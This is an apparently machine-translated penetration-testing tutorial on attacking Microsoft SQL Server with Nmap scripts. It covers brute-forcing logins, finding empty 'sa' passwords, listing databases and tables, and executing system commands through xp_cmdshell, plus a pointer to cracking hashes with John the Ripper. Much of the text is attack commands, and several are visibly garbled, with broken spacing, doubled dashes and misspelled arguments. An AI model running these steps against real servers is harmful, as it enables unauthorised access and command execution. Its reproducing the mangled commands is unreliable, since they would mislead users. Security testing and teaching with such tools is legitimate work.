The Nmap Scripting Engine allows us to use Nmap in addition scanner port and as a complete platform penetrationse testing.
In this post we will deal with some techniques that we can apply in a network to check on Us.
Generally SQL databases play by default on 1433.
By opening nmap we can give the following command:
Nmap - p1433 –script ms-sql-info xxx.xxx.xxx.xxx (ip SQL Server), the combination of nmap & Nmap Script Engine gives us information immediately about the SQL version, as well as the instance name.
In the nmap script engine there is ms-sql-brute which will check for the Password.
The command is nmap -p1433 –script ms-sql-brute xxx.xxx.xxx.xxx if we do not find anything we can use some custom password list, the command will be if we consider that the file with the passwords is pass.txt .
nmap -p1433 -script ms-sql-brute -script-args userdb = / var / pass.txt, passdb = / var / pass.txt
At the same time, the nmap script engine gives us the ability to find null passwords on infrastructures with Microsoft SQL server.
The order would be as follows
Nmap - p1433 –script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account does not have a password, to find which, which databases or sa has access we will use the ms-sql-hasdbaccess script with the following arguments:
Nmap - p1433 - -script ms-sql-hasdbaccess.nse - -script-args mssql.username = sa xxx.xxx.xxx.xxx
Then we will find the tables from the databases with the following command.
Nmap -p1433 - -script ms-sql-tables -script-args msql.username = sa xxx.xxx.xxx.xxx
In older versions of MSSQL (SQL 2000) xp_cmdshell is enabled by default and we can execute operating system commands through Nmap scripts such as.
Nmap –p1433 - -script ms-sql-xp-cmdshell - - script-args mssql.username = sa xxx.xxx.xxx.xxx
At Continuity
Nmap -p1433 – -script ms-sql-xp-cmdshell – -script –args=ms-sql-xp-cmdshell.cmd='net users' ,mssql.username=sa xxx.xxx.xxx.xxx
Also we should say that we can use nmap & the nmap script engine with other tools like john the rip. With john the ripper we can extract database password hashes to proceed with password cracking.
We thank her warmly SecTeam @johnzontos.